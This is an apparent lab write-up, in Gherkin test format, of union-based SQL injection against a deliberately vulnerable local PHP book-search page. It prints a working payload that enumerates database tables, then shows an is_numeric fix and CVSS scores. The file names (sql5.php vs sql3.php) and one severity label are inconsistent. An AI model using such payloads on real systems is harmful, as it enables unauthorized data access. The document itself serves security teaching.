## Version 1.4.1
## language: en

Feature:
  TOE:
    Vulnerable Web Application
  Category:
    SQL Injection
  Location:
    http://localhost/www/SQL/sql5.php - number (field)
  CWE:
    CWE-89: Improper Neutralization of Special Elements used
    in an SQL Command ('SQL Injection')
  Rule:
    REQ.173: https://fluidattacks.com/web/rules/173/
  Goal:
    Create an SQL injection to get database information
  Recommendation:
    Use prepared SQL statements and sanitize inputs

  Background:
  Hacker's software:
    | <Software name> | <Version>    |
    | Ubuntu          | 18.04 LTS    |
    | Firefox         | 70.0.1       |
  TOE information:
    Given The site
    And A search bar
    And the server is running MySQL version 14.14
    And PHP version 7.2
    And is running on Ubuntu 18.04 with kernel 5.0.0-37-generic

  Scenario: Normal use case
    Given A search bar
    When I enter a book number
    Then I get the book's name and author

  Scenario: Static detection
    Given The source code from "sql3.php"
    When I search for the SQL query inside the code
    """
    $query = "SELECT bookname, authorname FROM books WHERE number =".'$number';
    """
    Then The number is concatenated outside the query
    And I have the same SQL injection vulnerability as in the other levels
    But I can't use the single quote "'" character because of the validation
    """
    if(strchr($number,"'")){
      echo "What are you trying to do?<br>";
      echo "Awesome hacking skillzz<br>";
      echo "But you can't hack me anymore!";
      exit;
    }
    """

  Scenario: Dynamic detection
    Given The search bar
    When I put a single query inside the search bar
    Then The page returns an error and the complete query
    When I read the error
    """
    Book's number :
    Invalid query: Whole query: SELECT bookname,authorname
    FROM books WHERE number = 1 UNION
    """
    Then I see the error
    And I can try a union-based SQL Injection


  Scenario: Exploitation
    Given The vulnerability
    When I try to use a simple injection
    """
    1' OR 1 = 1
    """
    Then I get a message from the validation
    """
    What are you trying to do?
    Awesome hacking skillzz
    But you can't hack me anymore!
    """
    When I search another kind of SQLi
    Then I find information about union based SQLi
    """
    https://medium.com/@hninja049/example-of-a-error-based-sql-injection-dce72530271c
    """
    When I try to inject the query
    """
    1 union select 1,group_concat(table_name) from information_schema.tables
    where table_schema=database() --
    """
    Then I can enumerate the database

  Scenario: Remediation
    Given The source code
    When I validate if is numeric the value of the variable
    Then I add the next code in source
    """
    if(!is_numeric($number)){
    echo "Please only numeric values";
    exit(0);
    }
    """
    When If I re-run my exploit whit the same query
    """
    1 union select 1,group_concat(table_name) from information_schema.tables
    where table_schema=database() --
    """
    Then I get:
    """
    Please only numeric values
    """
    Then I can confirm that the vulnerability was successfully patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
    Base: Attributes that are constants over time and organizations
      7.5/10 (High) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    Temporal: Attributes that measure the exploit's popularity and fixability
      7.2/10 (High) - E:H/RL:O/RC:C/CR:H/IR:X/AR:X
    Environmental: Unique and relevant attributes to a specific user environment
      9.1/10 (Medium) - MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:H/MI:L/MA:L


  Scenario: Correlations
    No correlations have been found to this date 2019-12-13
